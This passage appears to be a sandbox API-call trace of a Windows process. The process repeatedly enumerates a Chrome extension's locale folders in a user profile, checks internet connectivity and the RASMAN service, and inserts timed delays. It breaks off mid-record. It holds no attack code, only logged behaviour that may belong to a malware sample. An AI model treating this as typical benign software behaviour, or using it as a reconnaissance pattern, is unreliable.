FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90Fmh\xe0\x91\xcf\x010CFi\xe0\x91\xcf\x01\xf0Tph\xe0\x91\xcf\x01\xf0Tph\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0Tph\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe5\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,565 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,565 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,626 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:21,626 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:21,626 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:21,626 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:21,626 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:21,866 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\id\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,866 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\x15~h\xe0\x91\xcf\x01\x00\xbcDi\xe0\x91\xcf\x010\xab\x82h\xe0\x91\xcf\x010\xab\x82h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xab\x82h\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe7\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,866 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,866 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,946 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\it\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,946 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xc7\x88h\xe0\x91\xcf\x01\xd04Ci\xe0\x91\xcf\x01\xb0\xe4\x8eh\xe0\x91\xcf\x01\xb0\xe4\x8eh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xe4\x8eh\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xdc\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,946 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,946 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,026 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\ja\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,026 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\x0f\x98h\xe0\x91\xcf\x01\xd04Ci\xe0\x91\xcf\x010\x1e\x9bh\xe0\x91\xcf\x010\x1e\x9bh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x1e\x9bh\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x0c\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,026 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,026 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,106 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\ko\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,106 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90,\x9eh\xe0\x91\xcf\x01\xd04Ci\xe0\x91\xcf\x01\xc0\xb3\x9fh\xe0\x91\xcf\x01\xc0\xb3\x9fh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xb3\x9fh\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,106 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,106 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,186 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\lt\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,186 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\xd0\xa5h\xe0\x91\xcf\x01\xd04Ci\xe0\x91\xcf\x01\xb0W\xa7h\xe0\x91\xcf\x01\xb0W\xa7h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0W\xa7h\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xf6\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,186 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,186 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,266 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\lv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,266 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\xde\xa8h\xe0\x91\xcf\x01\xd04Ci\xe0\x91\xcf\x01\x10f\xaah\xe0\x91\xcf\x01\x10f\xaah\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10f\xaah\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe5\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,266 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,266 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,347 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\nl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,347 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\xc4\xd9h\xe0\x91\xcf\x01\xd04Ci\xe0\x91\xcf\x01@\xd3\xdch\xe0\x91\xcf\x01@\xd3\xdch\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xd3\xdch\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe1\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,347 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,347 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,427 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:22,427 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:22,447 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00172940 | |
| 07:44:22,467 | 1308 | OpenServiceW |
ServiceControlManager => 0x00172940 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00172d00 | |
| 07:44:22,467 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:22,467 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:22,467 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:22,617 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\no\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,617 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0h\xe1h\xe0\x91\xcf\x01\xa0\xadAi\xe0\x91\xcf\x01\x00\xf0\xe2h\xe0\x91\xcf\x01\x00\xf0\xe2h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xe2h\xe0\x91\xcf\x01\x9e\xcd\xe2h\xe0\x91\xcf\x01\x00s\xc9 J6\xce\x01\x00\xf0\xe2h\xe0\x91\xcf\x01\xd8\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,617 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,617 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,697 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\pl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,697 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000w\xe4h\xe0\x91\xcf\x01\xa0\xadAi\xe0\x91\xcf\x01`\xfe\xe5h\xe0\x91\xcf\x01`\xfe\xe5h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xfe\xe5h\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,697 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,697 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,777 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\pt_BR\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,777 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x85\xe7h\xe0\x91\xcf\x01\xa0\xadAi\xe0\x91\xcf\x01\xc0\x0c\xe9h\xe0\x91\xcf\x01\xc0\x0c\xe9h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x0c\xe9h\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe9\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,777 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,777 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,857 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\pt_PT\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,857 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x93\xeah\xe0\x91\xcf\x01\xa0\xadAi\xe0\x91\xcf\x01 \x1b\xech\xe0\x91\xcf\x01 \x1b\xech\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x1b\xech\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe8\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,857 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,857 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:22,937 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\ro\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:22,937 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xa2\xedh\xe0\x91\xcf\x01\xa0\xadAi\xe0\x91\xcf\x01\x80)\xefh\xe0\x91\xcf\x01\x80)\xefh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80)\xefh\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:22,937 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:22,937 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,018 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\ru\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,018 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xb0\xf0h\xe0\x91\xcf\x01p&@i\xe0\x91\xcf\x01\x10\xbf\xf3h\xe0\x91\xcf\x01\x10\xbf\xf3h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xbf\xf3h\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,018 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,018 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,098 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\sk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,098 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@F\xf5h\xe0\x91\xcf\x01p&@i\xe0\x91\xcf\x01\xd0\xdb\xf9h\xe0\x91\xcf\x01\xd0\xdb\xf9h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xdb\xf9h\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe5\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 